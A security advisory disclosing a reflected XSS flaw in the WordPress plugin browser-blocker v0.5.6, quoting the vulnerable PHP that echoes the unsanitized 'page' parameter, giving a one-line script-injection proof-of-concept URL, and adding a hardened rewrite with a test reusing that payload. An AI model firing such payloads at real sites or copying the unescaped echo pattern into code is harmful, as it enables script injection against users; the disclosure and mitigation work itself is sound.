Advisory #: 328
Title: Reflected XSS in WordPress plugin browser-blocker v0.5.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/browser-blocker
Downloads: 8573
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: browser-blocker
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./browser-blocker/browser_blocker.php, at line 591 (wrapped here for readability):

    <a href="?page=<?php echo $_GET["page"] ?>&whichP=simple"><div id="bb_simple" class="tab <?php if(!isset($_GET["whichP"]) || $_GET["whichP"] == "simple"){ echo "open"; }else{ echo "closed"; } ?>" >Simple Options</div></a>
    <a href="?page=<?php echo $_GET["page"] ?>&whichP=advanced"><div id="bb_advanced" class="tab <?php if(isset($_GET["whichP"]) && $_GET["whichP"] == "advanced"){ echo "open"; }else{ echo "closed"; } ?>" >Advanced Options</div></a>
    <div style="clear:both"></div>

The page variable is echoed into both href attributes and appears to send unsanitized data back to the user's browser.
CVE-ID: Not Released
File: ./browser-blocker/browser_blocker.php
Exploit Code:
The exploit was derived from the first vulnerable parameter that appears in the code; there could be more in the code shown above.
This is an untested autogenerated exploit:
http://[target]/wp-content/plugins/browser-blocker/browser_blocker.php?page="><script>alert(1);</script><"
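
Mitigation example (added here, not the plugin's or the vendor's code): the line 591 markup rebuilt so that page is URL-encoded and then HTML-attribute-encoded before it reaches the href, and whichP is compared against an allow-list instead of being trusted. The helper name bb_render_tabs() is hypothetical; inside WordPress the same encoding is normally done with esc_attr() / esc_url().

```php
<?php
// Added example: hardened rendering of the two tab links from line 591.
// bb_render_tabs() is a hypothetical helper, not part of browser-blocker.

function bb_render_tabs(array $query): string
{
    // "page" is untrusted; accept it only as a string, else fall back to ''.
    $page = (isset($query['page']) && is_string($query['page'])) ? $query['page'] : '';

    // Only two tab values are meaningful, so allow-list them.
    // (Unlike the original, any unknown value falls back to the "simple" tab.)
    $which = (isset($query['whichP']) && $query['whichP'] === 'advanced')
        ? 'advanced' : 'simple';

    $tabs = ['simple' => 'Simple Options', 'advanced' => 'Advanced Options'];
    $html = '';
    foreach ($tabs as $id => $label) {
        // URL context: http_build_query() percent-encodes the parameter values.
        $href = '?' . http_build_query(['page' => $page, 'whichP' => $id]);
        // HTML attribute context: encode quotes, angle brackets and '&'.
        $href  = htmlspecialchars($href, ENT_QUOTES, 'UTF-8');
        $state = ($which === $id) ? 'open' : 'closed';
        $html .= '<a href="' . $href . '"><div id="bb_' . $id
               . '" class="tab ' . $state . '">' . $label . '</div></a>';
    }
    return $html . '<div style="clear:both"></div>';
}

// Constructed input: the "page" value taken from the advisory's test URL.
$out = bb_render_tabs(['page' => '"><script>alert(1);</script><"']);
echo $out, PHP_EOL;

// The value must come back percent-encoded, never as live markup.
if (stripos($out, '<script') !== false) {
    throw new RuntimeException('page value was reflected unencoded');
}
if (strpos($out, 'page=%22%3E%3Cscript%3E') === false) {
    throw new RuntimeException('expected percent-encoded page value in href');
}
```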